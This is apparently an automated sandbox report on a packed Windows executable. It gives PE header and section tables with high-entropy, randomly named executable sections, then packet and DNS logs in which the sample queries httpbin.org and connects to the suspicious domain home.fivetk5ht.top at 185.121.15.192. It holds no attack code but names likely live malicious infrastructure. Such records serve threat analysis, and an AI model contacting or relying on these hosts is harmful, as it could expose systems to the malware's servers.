Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74705f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x746000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc94e6c | 0x10 | zicceeoj
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc94e1c | 0x18 | zicceeoj
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
| 0x1000 | 0x745000 | 0x284c00 | 29eb8d0738190f365fcdff93b9690278 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x746000 | 0x1ac | 0x200 | f73afcc49f62029d6a3aa1bbcbd6181f | False | 0.583984375 | data | 4.523357056601817 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x747000 | 0x1000 | 0x200 | e84636d45557e74dadd0f14f36394655 | False | 0.166015625 | data | 1.1471680400846989 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
| 0x748000 | 0x38f000 | 0x200 | c8da4537e0a518e485bced0831b2539b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zicceeoj | 0xad7000 | 0x1be000 | 0x1be000 | 1b5af0168e6a966e97998203a85789ae | False | 0.9945489857763453 | data | 7.954541903209299 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xmbctvay | 0xc95000 | 0x1000 | 0x400 | 99824028c69b6db4186bf8cc453746d2 | False | 0.7373046875 | data | 5.922691116103226 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc96000 | 0x3000 | 0x2200 | fc1797c101fbd888be2777c143cda36f | False | 0.06192555147058824 | DOS executable (COM) | 0.7460648166046044 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc94e7c | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:44:40.720305920 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:40.720356941 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:40.720570087 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:40.737739086 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:40.737759113 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:42.491576910 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:42.492161989 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:42.492189884 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:42.493609905 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:42.493690014 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:42.495218992 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:42.495292902 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:42.509179115 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:42.509193897 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:42.560158968 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:42.829164982 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:42.829277992 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:42.829355001 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:42.846642971 CET | 49713 | 443 | 192.168.2.10 | 34.226.108.155
Dec 20, 2024 16:44:42.846668005 CET | 443 | 49713 | 34.226.108.155 | 192.168.2.10
Dec 20, 2024 16:44:44.244117975 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.364921093 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.365024090 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.366157055 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.485989094 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486027956 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486063957 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.486107111 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.486443043 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486502886 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.486732960 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486761093 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486782074 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.486788988 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486810923 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.486815929 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486836910 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.486843109 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486865044 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.486870050 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486890078 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.486896992 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.486938000 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.605748892 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.605762959 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.605772972 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.605994940 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.605995893 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.606012106 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.606064081 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.606076002 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.606096983 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.606148958 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.654866934 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.658267021 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.765845060 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.765927076 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:44.821964979 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.930145025 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:44.932334900 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.134601116 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.134727001 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.351752996 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.352067947 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.352258921 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.472013950 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472034931 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472050905 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472115040 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.472157001 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472171068 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472186089 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472203016 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472219944 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472271919 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.472318888 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472335100 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472364902 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.472388983 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.472405910 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472420931 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
Dec 20, 2024 16:44:45.472449064 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.472465038 CET | 49724 | 80 | 192.168.2.10 | 185.121.15.192
Dec 20, 2024 16:44:45.472486019 CET | 80 | 49724 | 185.121.15.192 | 192.168.2.10
                                                              Dec 20, 2024 16:44:45.472501993 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472527027 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472549915 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472734928 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472748995 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472793102 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.472825050 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472841024 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.472914934 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473037958 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473052979 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473113060 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473474026 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473491907 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473505020 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473517895 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473828077 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.473942995 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473958969 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473985910 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473994970 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.474014044 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.474033117 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.474040985 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.474051952 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.474087000 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.592140913 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592184067 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592277050 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.592360973 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592410088 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.592637062 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592680931 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592690945 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.592906952 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592917919 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592938900 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592948914 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592959881 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593265057 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593622923 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593635082 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593694925 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593749046 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593796968 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593815088 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593827963 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593838930 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593858957 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593893051 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593904018 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593919039 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593975067 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.594055891 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594067097 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594099998 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594099998 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.594142914 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.594271898 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594281912 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594290018 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594301939 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594333887 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.594338894 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594392061 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594403028 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594412088 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594423056 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594501972 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594547987 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594558001 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594567060 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594652891 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594703913 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594713926 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594722986 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594815969 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594825983 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594837904 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595093012 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595104933 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595115900 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595125914 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595138073 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595191956 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595201015 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595211029 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595220089 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595231056 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595242023 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595400095 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595411062 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.656512976 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.657150030 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.657219887 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.657466888 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.712255001 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712270975 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712282896 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712295055 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712371111 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712382078 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712393045 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712403059 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712412119 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713078022 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713088989 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713097095 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713109016 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713118076 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713128090 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713206053 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713216066 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713226080 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713236094 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713466883 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713476896 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713485956 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713498116 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713507891 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713562012 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713571072 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713579893 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713625908 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713644028 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713792086 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713802099 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713943958 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713953972 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713963985 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714056015 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714065075 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714073896 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714356899 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714366913 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714375973 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714387894 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714396954 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714407921 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714562893 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714572906 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714581966 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714591980 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714601994 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714664936 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714678049 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714689016 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714884043 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714894056 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714903116 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714914083 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714925051 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714935064 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715949059 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715960026 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715969086 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715979099 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715989113 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.716000080 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.776716948 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.776982069 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:46.756012917 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:46.875782967 CET8049730185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:46.875864029 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:46.876199961 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:46.995826960 CET8049730185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:48.151928902 CET8049730185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:48.152411938 CET8049730185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:48.152483940 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:48.152704954 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:48.272209883 CET8049730185.121.15.192192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:44:40.571445942 CET | 55909 | 53 | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:44:40.571607113 CET | 55909 | 53 | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:44:40.709120989 CET | 53 | 55909 | 1.1.1.1 | 192.168.2.10
Dec 20, 2024 16:44:40.709136963 CET | 53 | 55909 | 1.1.1.1 | 192.168.2.10
Dec 20, 2024 16:44:44.101731062 CET | 55912 | 53 | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:44:44.101731062 CET | 55912 | 53 | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:44:44.241940022 CET | 53 | 55912 | 1.1.1.1 | 192.168.2.10
Dec 20, 2024 16:44:44.241952896 CET | 53 | 55912 | 1.1.1.1 | 192.168.2.10
Dec 20, 2024 16:44:46.617084026 CET | 55914 | 53 | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:44:46.617084026 CET | 55914 | 53 | 192.168.2.10 | 1.1.1.1
Dec 20, 2024 16:44:46.754834890 CET | 53 | 55914 | 1.1.1.1 | 192.168.2.10
Dec 20, 2024 16:44:46.754981041 CET | 53 | 55914 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 16:44:40.571445942 CET | 192.168.2.10 | 1.1.1.1 | 0x5ca5 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:40.571607113 CET | 192.168.2.10 | 1.1.1.1 | 0x96c7 | Standard query (0) | httpbin.org | 28 (AAAA) | IN (0x0001) | false
Dec 20, 2024 16:44:44.101731062 CET | 192.168.2.10 | 1.1.1.1 | 0xc2c6 | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:44.101731062 CET | 192.168.2.10 | 1.1.1.1 | 0x63aa | Standard query (0) | home.fivetk5ht.top | 28 (AAAA) | IN (0x0001) | false
Dec 20, 2024 16:44:46.617084026 CET | 192.168.2.10 | 1.1.1.1 | 0xe752 | Standard query (0) | home.fivetk5ht.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:44:46.617084026 CET | 192.168.2.10 | 1.1.1.1 | 0xb2e1 | Standard query (0) | home.fivetk5ht.top | 28 (AAAA) | IN (0x0001) | false
